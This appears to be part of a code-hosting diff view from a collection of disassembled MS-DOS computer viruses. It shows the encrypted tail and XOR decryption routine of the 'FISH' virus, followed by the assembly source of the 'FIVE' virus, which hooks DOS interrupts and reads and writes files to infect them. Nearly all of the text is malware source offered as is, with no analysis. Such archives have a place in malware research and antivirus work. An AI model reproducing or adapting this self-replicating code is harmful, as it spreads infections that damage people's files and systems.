DB 1DH,0B9H, 5CH,0E5H, 57H,0F7H
DB 0EH,0DEH, 23H, 84H, 1BH, 08H
DB 02H,0F2H, 3BH, 15H, 0DH, 23H
DB 82H, 0BH, 0EH, 02H, 0EH, 13H
DB 1FH, 0DH, 8EH,0CEH, 1DH, 23H
DB 84H, 13H, 0CH, 02H,0F2H, 3BH
DB 19H, 0DH, 23H, 82H, 0BH,0F2H
DB 03H,0E4H, 25H, 0DH, 86H, 09H
DB 0EH, 49H, 0FH, 5EH, 86H, 51H
DB 09H,0FAH,0DEH, 0CH,0D5H, 56H
DB 79H, 6CH, 03H, 12H,0B7H, 0AH
DB 02H,0E5H,0B4H, 0FH,0E5H, 1AH
DB 0EH, 23H,0F3H, 0BH,0E2H, 03H
DB 0E5H, 1DH, 0CH, 23H,0F3H, 03H
DB 0E2H, 03H,0B9H, 5CH,0E5H, 08H
DB 0F7H,0E5H, 50H,0F7H,0E5H, 8DH
DB 0F7H,0E5H, 3FH,0F7H, 83H,0D6H
DB 83H,0CEH, 23H,0F2H, 3BH,0BEH
DB 03H, 23H,0F2H, 3BH,0E5H, 03H
DB 23H,0F2H, 3BH,0EBH, 03H, 82H
DB 0BH, 07H, 0DH, 82H, 0BH, 01H
DB 0DH, 13H,0BDH, 2FH,0C8H, 1BH
DB 07H, 0DH,0E5H, 8DH,0F7H, 12H
DB 90H, 55H, 23H, 86H, 2BH,0F2H
DB 03H, 23H, 83H, 1BH, 0CH, 02H
DB 23H,0F2H, 23H, 0EH, 02H
DB '^BAH', 86H, 'Q', 0CH, 86H, 8DH, '4'
DB 0FFH, 84H, 09H, 86H, 8DH, 36H
DB 0FFH, 84H, 49H, 0FH, 86H, 8DH
DB 30H,0FFH, 84H, 49H, 09H,0E5H
DB 0DAH, 0EH,0E6H, 96H, 31H, 0CH
DB 79H, 0EH,0E4H, 96H,0F1H, 23H
DB 8EH, 03H,0BEH, 03H, 0CH, 23H
DB 81H, 0BH, 2BH, 03H, 23H, 84H
DB 13H, 29H, 03H,0E5H,0A4H,0F4H
DB 0E5H, 85H,0F4H,0E5H, 9DH,0F4H
DB 23H,0C9H, 13H, 29H, 03H, 2BH
DB 0C8H, 7AH, 1FH, 7FH, 79H, 23H
DB 8DH, 2BH,0BEH, 03H,0F3H, 8EH
DB 0F3H, 0CH, 79H, 24H, 86H, 09H
DB 0EH, 49H, 0FH, 5EH, 86H, 51H
DB 09H,0FAH,0DEH, 0CH,0D5H
DB 'VxH', 86H, 'Q', 0CH, 86H, 8DH, '4'
DB 0FFH, 84H, 09H, 86H, 8DH, 36H
DB 0FFH, 84H, 49H, 0FH, 86H, 8DH
DB 30H,0FFH, 84H, 49H, 09H,0E6H
DB 21H, 86H, 1BH, 17H, 0DH,0E5H
DB 3FH, 0FH, 23H, 86H, 03H,0AEH
DB 03H, 8EH,0CCH, 1DH, 0CH,0C7H
DB 2BH, 84H, 5AH, 19H,0ACH, 15H
DB 0DH, 2BH, 84H, 4AH, 1FH,0ACH
DB 1FH, 0DH, 0EH,0CCH, 2BH, 84H
DB 4AH, 1DH,0ACH, 19H, 0DH, 2BH
DB 84H, 4AH, 03H,0E5H, 07H, 0FH
DB 23H, 83H, 13H,0AEH, 03H, 86H
DB 4BH, 0FH,0AEH, 07H, 0DH, 86H
DB 4BH, 09H,0AEH, 01H, 0DH,0E4H
DB 6EH,0F1H, 4BH, 44H, 5EH, 45H
DB 0E5H,0A6H, 09H,0E5H,0D1H, 0DH
DB 0CBH, 0BH, 2DH, 0DH, 0CH, 8CH
DB 33H, 0DH, 03H, 40H, 57H, 79H
DB 03H, 8CH, 33H, 0DH, 03H, 57H
DB 40H, 79H, 0BH,0F3H, 03H, 2DH
DB 0DH, 79H, 55H,0ACH, 09H, 03H
DB 0DCH,0ECH,0FAH,0ECH, 08H, 0DH
DB 0FH, 34H,0FDH, 7FH, 45H,0ACH
DB 07H, 03H, 06H, 0BH, 01H, 03H
DB 79H, 32H, 86H, 1BH,0A6H, 03H
DB 0B4H, 0DH, 0FH,0ACH,0A4H, 03H
DB 0FAH,0FCH, 06H,0DFH, 79H, 0CH
DB 4DH, 84H, 1BH, 0FH, 03H,0AEH
DB 09H, 03H, 8EH, 33H, 19H, 03H
DB 0CH, 79H, 60H,0CAH, 0BH, 19H
DB 03H, 0CH, 0DH, 86H,0CBH, 26H
DB 0BH, 05H, 03H,0AEH, 1BH, 03H
DB 8EH, 0BH, 09H, 03H, 0AH,0CAH
DB 0BH, 1DH, 03H, 0DH, 03H,0AEH
DB 03H, 03H,0E5H,0C0H, 0DH,0E6H
DB 46H, 8CH,0F3H, 0DH, 02H, 7EH
DB 48H,0ACH, 0DH, 03H,0AEH, 09H
DB 0DH, 0CH,0CFH,0ACH, 0FH, 03H
DB 0AEH, 0BH, 0DH, 0CH,0CFH,0ACH
DB 09H, 03H,0AEH, 05H, 0DH,0FAH
DB 0DDH, 0CH,0CFH, 79H, 24H,0ACH
DB 0FFH, 03H, 29H, 09H, 78H, 2FH
DB 0BCH,0E4H,0B5H, 1DH, 0DH, 85H
DB 03H, 0DH, 03H,0FAH,0EBH, 08H
DB 0C6H, 00H,0AEH, 0CH, 03H,0ACH
DB 0DH, 03H, 0EH, 0BH, 0FH, 03H
DB 0FAH,0D5H,0FAH,0DDH,0AEH, 09H
DB 03H,0E5H, 8DH, 0DH,0B9H, 33H
DB 0E5H, 3BH,0F5H, 23H, 86H, 03H
DB 0FFH, 03H,0B5H, 0CH, 4EH, 23H
DB 86H, 1BH,0F9H, 03H, 23H, 83H
DB 13H,0FBH, 03H,0E5H, 2CH,0F5H
DB 0E5H, 40H, 09H,0CEH, 03H,0B5H
DB 0DH, 5AH, 12H,0E5H, 18H,0F5H
DB 84H, 03H, 24H, 03H,0B5H, 0DH
DB 4FH, 84H, 1BH, 26H, 03H, 3EH
DB 0C4H, 3EH,0DFH,0E5H, 0EH,0F5H
DB 0B9H, 32H,0B7H, 0DH, 03H,0BCH
DB 11H,0E5H,0F4H,0FAH, 3EH,0C4H
DB 0B5H, 0DH, 4FH, 3EH,0DFH,0E5H
DB 0E2H,0FAH,0BCH, 11H,0B9H, 32H
DB 0B7H, 09H, 0DH,0E5H,0E8H,0FAH
DB 3EH,0C4H,0B5H, 0FH, 4FH, 86H
DB 0DCH,0E5H,0D6H,0FAH, 84H, 1BH
DB 0A6H, 03H,0AEH,0A4H, 03H, 86H
DB 0F5H, 08H, 02H, 0DH, 8EH,0DFH
DB 0DH, 28H,0FDH,0F2H, 24H,0CAH
DB 0B4H, 1DH, 0DH,0FAH,0FCH, 86H
DB 0FDH,0CEH, 5DH, 44H, 46H, 48H
DB 3EH,0C4H,0B5H, 0DH, 4FH, 86H
DB 0DCH,0E5H,0BCH,0FAH,0BCH, 11H
DB 0B9H, 4DH,0B7H, 0DH, 03H,0E5H
DB 0AAH,0FAH,0B5H, 1DH, 0DH,0FAH
DB 0EBH, 86H,0C7H, 86H,0DDH,0B5H
DB 0DH, 4FH,0E5H, 95H,0FAH,0B4H
DB 0DH, 03H, 3EH,0DFH, 0CH,0F4H
DB 0B9H, 4DH, 23H,0CBH, 0BH, 3EH
DB 03H, 0CH, 5EH,0E5H,0D0H, 09H
DB 56H, 86H, 03H, 24H, 03H,0B5H
DB 0CH, 5AH, 86H, 1BH, 26H, 03H
DB 0FBH,0CBH, 8DH, 78H, 0EH, 8DH
DB 0CBH,0C5H,0E5H, 63H,0FAH,0CEH
DB 0E5H,0C8H,0FAH, 84H,0DAH, 8EH
DB 0CAH, 00H, 13H, 0AH,0E6H, 2DH
DB 0E5H,0B4H,0FAH, 13H, 0AH,0B4H
DB 5DH, 0DH, 84H,0DAH,0BEH, 0DH
DB 3EH,0CDH, 8DH, 70H, 0CH, 37H
DB 78H, 08H, 87H, 10H, 8DH,0EEH
DB 12H, 23H, 85H, 13H, 25H, 03H
DB 0FFH,0A3H, 86H, 48H,0F0H, 28H
DB 0D2H,0D2H, 0FH,0EDH, 87H, 48H
DB 0F1H, 29H,0D2H, 0FH,0C9H, 23H
DB 0CBH, 0BH, 2DH, 0DH, 0DH, 31H
DB 0D2H, 79H, 04H, 23H,0F3H, 0BH
DB 2DH, 0DH, 31H,0EFH, 78H, 00H
DB 0E5H, 5FH,0FAH,0F5H,0CEH
DB '@LNFH_HA'
DB 0E5H, 48H,0FAH,0F4H,0CEH, 5EH
DB 0B9H, 5CH,0E5H, 0AH,0FAH, 23H
DB 84H, 13H,0AEH, 03H, 56H,0CEH
DB 0E5H,0A1H, 0FH, 5FH,0B9H, 3BH
DB 23H, 87H, 1BH, 25H, 03H,0E5H
DB 0FFH,0FBH,0FAH,0ECH,0FAH,0EEH
DB 84H,0DEH, 57H, 06H,0D6H, 78H
DB 08H, 30H, 0DH, 4DH, 7FH, 45H
DB 0B5H, 0DH, 4EH,0E5H,0D1H,0FBH
DB 7FH, 4DH, 23H, 84H, 1BH,0F9H
DB 03H, 23H, 84H, 03H,0FFH, 03H
DB 23H, 81H, 13H,0FBH, 03H,0B5H
DB 0CH, 4EH, 3EH,0C4H,0E5H,0CEH
DB 0FBH, 23H, 8DH, 33H,0D7H, 03H
DB 0DH, 78H, 2CH,0B5H, 0FH, 30H
DB 0E5H,0B8H,0FBH, 7FH, 14H, 86H
DB 0D5H, 5EH,0B9H, 3FH, 23H, 87H
DB 1BH, 25H, 03H,0E5H,0ABH,0FBH
DB 86H, 4AH, 13H, 23H,0AEH,0E1H
DB 03H, 56H,0E5H,0C7H, 0FH,0CEH
DB 3EH,0D6H, 46H,0E5H,0CEH, 0FH
DB 0CEH, 5CH, 5FH, 5DH,0B5H, 0DH
DB 49H,0E5H, 87H,0FBH, 8DH,0FFH
DB 8DH,0FBH,0CFH, 8DH, 79H, 04H
DB 0B5H, 0DH, 5AH,0E5H, 71H,0FBH
DB 0FBH,0CBH, 8DH, 55H, 57H, 54H
DB 0CEH,0E5H,0C0H,0FBH, 3EH,0C4H
DB 0B5H, 0CH, 4FH, 3EH,0DFH,0E5H
DB 65H,0FBH, 23H, 84H, 1BH,0AAH
DB 03H, 23H,0AEH,0A8H, 03H,0B5H
DB 0FH, 4FH, 3EH,0C4H, 3EH,0DFH
DB 0E5H, 58H,0FBH, 23H, 84H, 1BH
DB 0A6H, 03H, 23H,0AEH,0A4H, 03H
DB 0B5H, 0DH, 4FH, 23H, 86H, 1BH
DB 0A8H, 03H, 23H, 86H, 03H,0AAH
DB 03H,0E5H, 31H,0FBH,0E5H, 62H
DB 0FBH,0CEH, 4BH, 44H, 5EH, 45H
DB 07H,0CDH, 78H, 2FH, 23H, 8EH
DB 2BH,0BEH, 03H,0F3H,0E5H, 48H
DB 0FBH,0E5H, 29H,0FBH, 7FH, 06H
DB 0FBH,0CBH, 8DH, 79H, 0EH, 8DH
DB 0E3H,0C5H,0E4H, 15H,0F4H, 23H
DB 8EH, 03H,0BEH, 03H, 0CH,0E4H
DB 02H,0F4H, 31H, 0CH, 78H, 3AH
DB 23H, 8EH, 2BH,0BEH, 03H,0F3H
DB 0FBH,0CBH, 8DH, 79H, 0EH, 8DH
DB 0E3H,0C5H,0E5H, 6BH,0F2H, 79H
DB 0EH, 8DH,0CBH,0C5H,0E5H,0FCH
DB 0F8H, 84H, 4BH,0F1H, 23H, 8EH
DB 1BH,0BEH, 03H, 0DH,0E4H, 48H
DB 0F4H, 31H, 0FH, 78H, 03H,0E5H
DB 46H,0F2H, 79H, 04H, 8CH, 63H
DB 0FBH, 0DH, 03H, 8EH, 53H,0F5H
DB 0DH,0E4H,0C0H,0F5H,0E5H,0D5H
DB 0F8H,0B9H, 27H,0E5H,0C5H,0F8H
DB 8CH,0F4H,0CAH, 0AH, 7FH, 06H
DB 0B9H, 04H, 03H, 12H,0B7H,0A6H
DB 0CH,0E5H,0B5H,0F8H,0F9H,0E5H
DB 0DFH,0F8H,0CEH, 23H, 8DH, 2BH
DB 0BEH, 03H,0F3H,0E5H, 1AH,0F2H
DB 79H,0D8H, 23H, 84H, 1BH,0A0H
DB 03H, 23H, 84H, 03H,0A2H, 03H
DB 23H,0CAH, 0BH,0BCH, 03H, 0DH
DB 0DH,0E5H, 12H,0F2H, 23H,0ACH
DB 0A4H, 03H, 23H, 86H, 1BH,0A6H
DB 03H, 20H, 0DH, 03H, 8EH,0D7H
DB 0DH, 23H, 26H, 0BH,0A8H, 03H
DB 23H, 16H, 1BH,0AAH, 03H, 74H
DB 05H,0CAH, 4BH,0F1H, 0DH, 0DH
DB 0E4H, 20H,0F7H, 78H, 05H, 36H
DB 0CCH, 7AH, 09H, 23H,0AEH,0A2H
DB 03H, 23H, 86H, 03H,0AAH, 03H
DB 23H, 86H, 1BH,0A8H, 03H, 06H
DB 0C4H, 78H, 08H, 8EH,0F7H, 11H
DB 7BH, 17H, 23H, 86H, 1BH,0A0H
DB 03H,0B9H, 32H, 23H, 86H, 03H
DB 0A2H, 03H,0E5H, 48H,0F8H, 23H
DB 0EH, 0BH,0BCH, 03H, 84H, 4BH
DB 0F1H,0E4H, 97H,0F5H, 84H,0DAH
DB 84H,0DBH, 23H, 0EH, 33H,0A2H
DB 03H, 8EH,0F2H, 11H, 7FH, 05H
DB 3EH,0F2H,0E6H, 04H, 59H, 58H
DB 43H, 4CH, 8EH,0E2H, 11H,0FAH
DB 0D2H, 86H,0CFH, 23H, 86H, 1BH
DB 0A4H, 03H, 23H, 86H, 03H,0A6H
DB 03H, 8EH,0CFH, 02H, 8EH,0DCH
DB 0DH, 8EH,0EFH,0FDH, 8CH,0E7H
DB 0F1H, 00H, 8EH,0D4H, 0DH, 0CH
DB 0CFH, 8EH,0DCH, 0DH,0B5H, 0DH
DB 4FH,0E5H,0F5H,0F9H,0B4H, 11H
DB 0DH, 24H,0F4H, 24H,0FCH,0B9H
DB 32H, 23H, 86H, 1BH,0A0H, 03H
DB 0E5H,0EAH,0F9H, 23H, 0CH, 0BH
DB 0A0H, 03H, 23H, 24H, 0BH,0A2H
DB 03H, 23H, 0CH, 0BH,0BCH, 03H
DB 3EH,0C4H,0B5H, 0DH, 4FH,0B7H
DB 11H, 0DH,0E5H,0C0H,0F9H,0E4H
DB 7BH,0F2H, 23H, 2CH, 2BH, 3CH
DB 03H,0E4H, 35H, 0CH, 23H, 8EH
DB 2BH,0BEH, 03H,0F3H,0E5H,0DAH
DB 0F9H,0E5H,0BBH,0F9H,0E5H,0B3H
DB 0F9H, 7EH, 04H, 23H, 8EH, 03H
DB 0BEH, 03H, 0CH,0E4H, 05H,0F5H
DB 0E5H, 94H,0F4H,0FBH, 4AH, 14H
DB 8DH, 78H, 0EH,0E4H,0F1H,0FAH
DB 8CH, 62H, 17H, 0DH, 03H, 8EH
DB 52H, 11H
DB 0DH, 8DH, 62H
LOC_3:
ADC AL,0C5H
IN AL,0E1H ; port 0E1H, Memory encode reg1
CLI ; Disable interrupts
OUT 83H,AL ; port 83H, DMA page reg ch 1
OR CX,[BX+SI+3]
OR DX,[BP+SI]
DB 0F3H, 03H, 0EH, 0DH, 81H,0D7H
DB 47H, 83H,0D7H,0ACH, 0EH, 0DH
DB 0F3H,0C1H, 0CH,0CFH,0AEH, 0EH
DB 0DH, 52H, 4FH, 83H,0CFH, 03H
DB 12H,0E5H,0D2H, 0DH,0ACH,0B3H
DB 0F3H, 02H,0B4H, 0DH, 05H, 84H
DB 0FAH,0F0H,0FEH,0A8H,0F1H, 0BH
DB 0B5H,0D0H, 0CH, 5DH, 23H, 83H
DB 0BH, 48H, 03H,0C6H, 23H,0CBH
DB 0BH,0D7H, 03H, 0DH,0E5H,0AEH
DB 0F9H, 03H,0E5H, 77H,0F2H, 85H
DB 0BDH, 1EH, 12H,0E5H,0F1H,0F9H
DB 81H, 0BH, 22H, 03H, 84H, 13H
DB 20H, 03H, 81H, 0BH, 36H, 03H
DB 0BFH, 0FH, 84H, 13H, 34H, 03H
DB 85H, 1BH, 5DH, 03H,0E5H,0CFH
DB 0F9H, 84H, 2BH,0D2H, 03H, 81H
DB 1BH,0D0H, 03H, 03H,0B5H, 24H
DB 01H, 5DH,0B5H, 7DH, 0DH,0B4H
DB 0F2H,0F2H, 83H,0CDH, 3EH,0F2H
DB 0BDH,0C6H,0FFH,0A3H, 42H, 91H
DB 0BH, 5AH, 91H, 55H, 8DH,0C1H
DB 0CH, 5DH, 90H, 3EH,0CDH,0F2H
DB 23H, 20H, 03H, 03H, 12H,0E5H
DB 64H, 0DH, 81H,0BDH, 1EH,0B7H
DB 9DH, 00H,0E5H, 9EH,0F9H,0BDH
DB 29H,0E5H,0A9H,0F9H, 84H, 13H
DB 30H, 03H,0B7H,0C8H, 00H,0BDH
DB 29H, 81H, 0BH, 32H, 03H,0E5H
DB 73H,0F9H,0E5H, 05H,0F9H,0CEH
DB 0E5H, 24H,0F9H, 23H,0C8H, 1BH
DB 34H, 03H,0BDH, 1EH,0E5H, 60H
DB 0F9H, 23H,0C8H, 1BH, 30H, 03H
DB 0BDH, 29H,0E5H, 6EH,0F9H,0E5H
DB 0E0H,0FEH,0CEH, 58H, 84H,0E8H
DB 8CH, 6BH, 0BH,0F2H,0F3H,0F2H
DB 4BH, 17H, 50H,0C2H, 23H,0CAH
DB 0BH, 5DH, 03H, 0CH, 09H,0E5H
DB 30H,0F9H,0E5H,0B7H,0FEH, 5DH
DB 23H,0ACH,0BEH, 03H, 00H, 0DH
DB 0CH, 5DH, 90H, 55H, 50H, 23H
DB 0F2H, 23H, 38H, 03H, 84H,0E5H
DB 9FH,0FEH,0BDH, 0CH,0B7H, 66H
DB 01H, 03H, 12H,0E5H, 2BH,0F9H
DB 91H, 55H, 00H, 0DH, 0CH, 5DH
DB 90H, 4DH,0FAH,0EDH, 3AH,0AEH
DB 3CH, 03H,0E5H, 87H,0FEH,0CEH
DB 0F2H, 58H, 84H,0E8H, 5DH, 8CH
DB 73H, 09H, 0DH,0CDH, 7EH, 01H
DB 23H,0ACH, 4AH, 03H, 34H, 4BH
DB 09H, 7BH, 0EH, 55H, 50H,0C2H
DB 23H, 8DH, 33H, 5DH, 03H, 0CH
DB 79H, 2BH, 86H, 4BH, 09H, 23H
DB 0AEH, 22H, 03H, 86H, 4BH, 0FH
DB 23H,0AEH, 20H, 03H, 7FH, 02H
DB 55H, 50H, 23H, 86H, 2BH,0D2H
DB 03H, 23H, 83H, 1BH,0D0H, 03H
DB 0E4H, 39H,0F2H, 8CH, 6BH, 0BH
DB 0F2H,0F3H,0E6H,0C2H, 23H,0F3H
DB 03H, 5CH, 03H, 78H,0C5H, 8CH
DB 6BH, 0BH,0F2H,0F3H,0E5H, 7CH
DB 0FEH,0E5H, 13H,0FEH,0B9H, 21H
DB 0E5H, 03H,0FEH, 23H, 85H, 1BH
DB 5CH, 00H, 23H, 85H, 1BH, 63H
DB 00H, 8DH,0E1H, 0FH,0E5H,0F3H
DB 0FFH, 0FH,0FFH
DATA_4 DD 893B8523H
DB 00H, 23H, 85H, 3BH,0D1H, 00H
DB 0BDH, 0EH,0E5H,0A1H,0FEH, 0BH
DB 12H, 84H,0D7H,0BDH, 0CH,0E5H
DB 80H,0FEH,0E5H,0F2H,0FFH,0E5H
DB 52H,0FEH,0E5H, 1CH,0FEH, 5EH
DB 5CH,0B6H, 25H, 0DH,0B4H, 8AH
DB 0FH, 23H, 8DH, 3AH, 10H, 8EH
DB 0CEH, 08H,0EFH,0FAH, 54H, 56H
DB 0E6H, 97H, 23H, 8DH, 03H, 25H
DB 0DH, 0DH, 79H, 1EH, 5EH, 5CH
DB 0B6H, 25H, 0DH,0B4H, 8AH, 0FH
DB 23H, 8DH, 3AH, 10H, 8EH,0CEH
DB 08H,0EFH,0FAH, 54H, 56H,0E4H
DB 0FEH,0F9H, 5CH, 5EH,0B6H, 25H
DB 0DH,0B4H, 55H, 0DH, 2EH, 80H
DB 37H, 0DH, 43H,0E2H,0F9H, 5BH
DB 59H,0E8H, 94H,0F2H,0EBH, 3FH
DB 0B8H, 2EH, 8FH, 06H, 41H, 0EH
DB 2EH, 8FH, 06H, 43H, 0EH, 2EH
DB 8FH, 06H,0DBH, 0EH, 2EH, 83H
DB 26H,0DBH, 0EH,0FEH, 2EH, 80H
DB 3EH,0DAH, 0EH, 00H, 75H, 11H
DB 2EH,0FFH, 36H,0DBH, 0EH, 2EH
DB 0FFH, 1EH, 2DH, 0EH, 73H, 06H
DB 2EH,0FEH, 06H,0DAH, 0EH,0F9H
DB 2EH,0FFH, 2EH, 41H, 0EH, 89H
DB 32H,0C0H, 2EH,0C6H, 06H,0DAH
DB 0EH, 01H,0CFH
LOC_4:
CALL SUB_1 ; (0EE1)
FISH ENDP
;==========================================================================
; SUBROUTINE
;==========================================================================
SUB_1 PROC NEAR
POP BX
SUB BX,0DA9H
MOV CX,0D58H
LOCLOOP_5:
XOR BYTE PTR CS:[BX],0DH
INC BX
LOOP LOCLOOP_5 ; Loop if cx > 0
DEC BYTE PTR CS:DATA_1E[BX] ; (97E0:00B3=0)
JZ LOC_RET_6 ; Jump if zero
JMP LOC_2 ; (035A)
LOC_RET_6:
RETN
SUB_1 ENDP
AND [BP+49H],AL
PUSH BX
DEC AX
AND [BP],AL
SEG_A ENDS
END START
MSDOS/F-Index/Virus.MSDOS.Unknown.fish_.asm
+1733
View File
File diff suppressed because it is too large Load Diff
MSDOS/F-Index/Virus.MSDOS.Unknown.five.asm
+285
View File
@@ -0,0 +1,285 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ FIVE ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 18-Jan-91 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 5 Analysis Options on: H ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 200h ; (0000:0200=0)
data_2e equ 4 ; (7415:0004=0)
data_6e equ 0FE07h ; (7415:FE07=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
five proc far
start:
mov si,4
mov ds,si
lds dx,dword ptr [si+8] ; Load 32 bit ptr
mov ah,13h
int 2Fh ; Multiplex/Spooler al=func 00h
; get installed status
push ds
push dx
int 2Fh ; Multiplex/Spooler al=func 00h
; get installed status
pop ax
mov di,0F8h
stosw ; Store ax to es:[di]
pop ax
stosw ; Store ax to es:[di]
mov ds,si
lds ax,dword ptr [si+40h] ; Load 32 bit ptr
cmp ax,117h
stosw ; Store ax to es:[di]
mov ax,ds
stosw ; Store ax to es:[di]
push es
push di
jnz loc_1 ; Jump if not zero
shl si,1 ; Shift w/zeros fill
mov cx,1FFh
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_2 ; Jump if zero
loc_1:
mov ah,52h ; 'R'
int 21h ; DOS Services ah=function 52h
; get DOS data table ptr es:bx
push es
mov si,0F8h
les di,dword ptr es:[bx+12h] ; Load 32 bit ptr
mov dx,es:[di+2]
mov cx,207h
rep movs byte ptr es:[di],ss:[si] ; Rep when cx >0 Mov [si] to es:[di]
mov ds,cx
mov di,16h
mov word ptr [di+6Eh],117h
mov [di+70h],es
pop ds
mov [bx+14h],dx
mov dx,cs
mov ds,dx
mov bx,[di-14h]
dec bh
mov es,bx
cmp dx,[di]
mov ds,[di]
mov dx,[di]
dec dx
mov ds,dx
mov si,cx
mov dx,di
mov cl,28h ; '('
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov ds,bx
jc loc_4 ; Jump if carry Set
loc_2:
mov si,cx
mov ds,ss:[si+2Ch]
loc_3:
lodsw ; String [si] to ax
dec si
or ax,ax ; Zero ?
jnz loc_3 ; Jump if not zero
lea dx,[si+3] ; Load effective addr
loc_4:
mov ax,3D00h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
xchg ax,bx
pop dx
push dx
push cs
pop ds
push ds
pop es
mov cl,2
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov dl,cl
xchg cl,ch
mov al,byte ptr ds:[100h] ; (7415:0100=0BEh)
cmp al,data_5 ; (7415:02FF=2Ah)
jne loc_5 ; Jump if not equal
mov ah,3Fh ; '?'
loc_5:
jmp $-157h
five endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
push bx
mov ax,1220h
int 2Fh ; Multiplex/Spooler al=func 20h
mov bl,es:[di]
mov ax,1216h
int 2Fh ; Multiplex/Spooler al=func 16h
pop bx
lea di,[di+15h] ; Load effective addr
mov bp,200h
retn
sub_1 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
mov ah,3Fh ; '?'
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
pushf ; Push flags
push cs
call sub_4 ; (0248)
retn
sub_2 endp
db 0E8h, 0DFh, 0FFh, 26h, 8Bh, 35h
db 0E8h, 0EFh, 0FFh, 72h, 24h, 3Bh
db 0F5h, 73h, 20h, 50h, 26h, 8Ah
db 45h, 0F8h, 0F6h, 0D0h, 24h, 1Fh
db 75h, 14h, 26h, 3, 75h, 0FCh
db 26h, 87h, 35h, 26h, 1, 6Dh
db 0FCh, 0E8h, 0D0h, 0FFh, 26h, 29h
db 6Dh, 0FCh, 96h, 0ABh
loc_6:
pop ax
loc_7:
pop es
pop si
pop di
pop bp
retf 2 ; Return far
db 0E8h, 0C1h, 0FFh, 9Fh, 8Ah, 0C1h
db 24h, 1Fh
db 3Ch
data_4 db 1Fh
db 75h, 2, 32h, 0C8h
loc_8:
sahf ; Store ah into flags
jmp short loc_6 ; (01F6)
db 55h, 57h, 56h, 6, 0FCh, 8Bh
db 0ECh, 8Eh, 46h, 0Ah, 0BFh, 17h
db 1, 8Bh, 0F7h, 2Eh, 0A7h, 74h
db 22h, 80h, 0FCh, 3Fh, 74h, 0A1h
db 50h, 3Dh, 0, 57h, 74h, 0D1h
db 80h, 0FCh, 3Eh, 9Ch, 53h, 51h
db 52h, 1Eh, 74h, 1Bh, 3Dh, 0
db 4Bh, 74h, 11h
loc_9:
pop ds
pop dx
pop cx
pop bx
popf ; Pop flags
jz loc_6 ; Jump if zero
pop ax
pop es
pop si
pop di
pop bp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
jmp dword ptr cs:data_2e ; (7415:0004=0)
db 0B4h, 3Dh, 0CDh, 21h, 93h, 0E8h
db 55h, 0FFh, 72h, 0E5h, 33h, 0C9h
db 87h, 0CDh, 8Eh, 0DDh, 0BEh, 4Ch
db 0, 0ADh, 50h, 0ADh, 50h, 0B8h
db 24h, 25h, 50h, 0FFh, 74h, 40h
db 0FFh, 74h, 42h, 0Eh, 1Fh, 0BAh
db 67h, 0, 0CDh, 21h, 0C5h, 54h
db 0B0h, 0B0h, 13h, 0CDh, 21h, 6
db 1Fh, 89h, 2Dh, 88h, 6Dh, 0EDh
db 81h, 7Dh, 14h, 4Fh, 4Dh, 75h
db 34h, 8Bh, 55h, 0FCh, 2, 0F5h
db 80h, 0FEh, 4, 72h, 2Ah, 0F6h
db 45h, 0EFh, 4, 75h, 24h, 0C5h
db 75h, 0F2h, 38h, 6Ch, 4, 76h
db 8, 4Ah, 0D0h, 0EEh, 22h, 74h
db 4, 74h, 14h
loc_10:
mov ds,bp
mov dx,cx
call sub_2 ; (01C0)
mov si,dx
dec cx
locloop_11:
lodsb ; String [si] to al
cmp al,cs:data_6e[si] ; (7415:FE07=0)
jne loc_13 ; Jump if not equal
loop locloop_11 ; Loop if cx > 0
loc_12:
mov ah,3Eh ; '>'
call sub_3 ; (01C2)
pop ds
pop dx
pop ax
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
pop ds
pop dx
mov al,13h
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
jmp loc_9 ; (023C)
loc_13:
mov cx,dx
mov si,es:[di-4]
mov es:[di],si
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
